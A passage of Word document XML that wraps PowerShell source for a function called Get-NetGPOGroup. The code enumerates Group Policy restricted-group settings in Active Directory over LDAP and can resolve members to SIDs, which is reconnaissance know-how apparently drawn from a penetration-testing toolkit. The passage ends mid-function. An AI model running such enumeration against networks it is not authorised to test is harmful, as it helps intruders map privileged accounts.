    <w:p w14:paraId="7249DFA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17151D79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201879B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6601EAEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729E353A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A6CD593" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4A4AA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="491E07B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through for GPOs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201AA976" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E3CD43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7346626C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ResolveMemberSIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3AB654" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D71A056" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Try to resolve the SIDs of all found group members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B20EBC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6901A6F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6EB614" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="554C1C7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Mount any found policy files with temporary PSDrives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EDF818" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B53A742" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13445018" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3EC15647" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A17A60E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="184A2CC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A4588E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6BE63B5D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetGPOGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8061AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A305D01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all local groups set by GPO along with their members and memberof.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6CAE88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10704F9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAAA9A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="113A416F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetGPOGroup -ResolveMemberSIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ECFECB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58F75F73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all local groups set by GPO along with their members and memberof,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2515B757" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        and resolve any members to their domain SIDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D27590D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79901665" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B81641" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C3A954D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetGPOGroup -GPOName '{0847C615-6C4E-4D45-A064-6001040CC21C}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7E9512" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6929B52B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return any GPO-set groups for the GPO with the given name/GUID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00182677" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="39884FAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D64FB96" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="66146DE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetGPOGroup -DisplayName 'Desktops'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C90A8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13A61EE3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return any GPO-set groups for the GPO with the given display name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FB9A44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D5A1E8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65533774" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="44833F5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        https://morgansimonsenblog.azurewebsites.net/tag/groups/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A22FE5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B855AB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35F57D4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D447D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD3DEC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A16B842" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPOname = '*',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A7A3C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E41EC8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C6AA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DisplayName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0733B667" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="65E92FF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE1C017" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18931663" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DCE9A3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A004B43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58542427" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2EFBCBB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC28293" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D17EE23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A17790D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318BB460" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ResolveMemberSIDs,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579399BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="547E0A2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02595FBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UsePSDrive,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BA3451" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3775E7C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4149EB20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCE140C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE40001" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E0F291" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34C6741A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Option = [System.StringSplitOptions]::RemoveEmptyEntries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C60D19A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6955D7B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # get every GPO from the specified domain with restricted groups set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4147FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Get-NetGPO -GPOName $GPOname -DisplayName $DisplayName -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -PageSize $PageSize | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C73C42C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3039B137" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPOdisplayName = $_.displayname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30504DBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPOname = $_.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C345CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPOPath = $_.gpcfilesyspath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4559596F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0FC8C541" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ParseArgs =  @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2443FE7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'GptTmplPath' = "$GPOPath\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F87043C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'UsePSDrive' = $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BA512E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC93451" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50E8E2C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # parse the GptTmpl.inf 'Restricted Groups' file if it exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11503CCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Inf = Get-GptTmpl @ParseArgs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E38E514" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="77B905FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        if($Inf -and ($Inf.psbase.Keys -contains 'Group Membership')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10276699" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5297AB29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Memberships = @{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8E2AD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C0E9057" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # group the members/memberof fields for each entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C41459" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Membership in $Inf.'Group Membership'.GetEnumerator()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4D83C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Group, $Relation = $Membership.Key.Split('__', $Option) | ForEach-Object {$_.Trim()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC472C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="617348AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # extract out ALL members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB80AA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $MembershipValue = $Membership.Value | Where-Object {$_} | ForEach-Object { $_.Trim('*') } | Where-Object {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157CD760" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="715F2E47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($ResolveMemberSIDs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7F40AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # if the resulting member is username and not a SID, attempt to resolve it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE0C919" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupMembers = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498F89FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    ForEach($Member in $MembershipValue) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AD9ACF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($Member -and ($Member.Trim() -ne '')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7918C040" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if($Member -notmatch '^S-1-.*') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45945B46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $MemberSID = Convert-NameToSid -Domain $Domain -ObjectName $Member | Select-Object -ExpandProperty SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E685D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                if($MemberSID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7776B31D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $GroupMembers += $MemberSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC25EFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC2E8B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1665FE3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $GroupMembers += $Member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D70A27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AD6984" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B59D48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065FB311" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $GroupMembers += $Member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206559D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B34253B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A853501" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734F48D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $MembershipValue = $GroupMembers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA6C5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0C538C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7FEE164B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if(-not $Memberships[$Group]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDA45F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Memberships[$Group] = @{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB9EA6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A62E9CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($MembershipValue -isnot [System.Array]) {$MembershipValue = @($MembershipValue)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB06300" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Memberships[$Group].Add($Relation, $MembershipValue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD29E55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371130F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="298F7661" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
